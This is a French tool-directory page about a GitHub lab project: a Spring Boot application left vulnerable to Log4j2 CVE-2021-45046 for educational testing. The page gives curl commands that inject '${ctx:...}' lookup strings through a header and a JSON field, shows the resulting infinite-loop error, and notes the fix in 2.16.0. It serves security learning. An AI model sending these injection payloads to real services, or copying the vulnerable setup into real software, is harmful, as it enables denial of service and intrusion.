Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4j2-CVE-2021-45046 — Exemple d'application web Spring Boot vulnérable à Log4j2 CVE-2021-45046, démontrant l'injection JNDI et l'exploitation de boucle infinie pour des tests de sécurité éducatifs. | Kitploit
Outils/GitHubGitHub/pravin-pp/log4j2-cve-2021-45046
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubpravin-pp/log4j2-cve-2021-45046

log4j2-CVE-2021-45046

Exemple d'application web Spring Boot vulnérable à Log4j2 CVE-2021-45046, démontrant l'injection JNDI et l'exploitation de boucle infinie pour des tests de sécurité éducatifs.

Voir le dépôt
il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exemple d'application vulnérable Log4j2 (CVE-2021-45046)

Versions affectées : toutes les versions de 2.0-beta9 à 2.15.0

Cette application est basée sur une application web Spring Boot vulnérable à CVE-2021-45046.

Elle utilise Log4j 2.14.1 (via spring-boot-starter-log4j2 2.6.1).

Exécution de l'application

Lancez-la :

root@kitploit:~
Importez le projet dans un IDE Java en tant que projet Maven.

Exécutez CVEMainApplication.java en tant qu'application Spring Boot.

Étapes d'exploitation

  • Ensuite, déclenchez l'exploit en utilisant :
root@kitploit:~
Pour GET ->
curl 127.0.0.1:8080 -H 'X-Api-Version: ${ctx:apiVersion}'


Pour requête POST ->
curl --location --request POST 'http://127.0.0.1:8080/addrecord' \
--header 'Content-Type: application/json' \
--data '{
	"clientRef": "${ctx:clientRef}"
}'
  • Notez la sortie indiquant une boucle infinie ; toutefois, lors des tests, il n'a pas été constaté que cette déni de service consomme des ressources, car cette boucle infinie est identifiée par le programme et génère une erreur :
root@kitploit:~

${ctx:clientRef}2021-12-15 19:27:50,212 http-nio-8080-exec-1 ERROR An exception occurred processing Appender LogToConsole java.lang.IllegalStateException: Infinite loop in property interpolation of  ${ctx:clientRef}: ctx:clientRef
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.checkCyclicSubstitution(StrSubstitutor.java:1081)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1029)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1042)
	

Atténuation :

  • Log4j 2.16.0 corrige ce problème en supprimant la prise en charge des motifs de recherche de messages et en désactivant la fonctionnalité JNDI par défaut.
Télécharger l’outil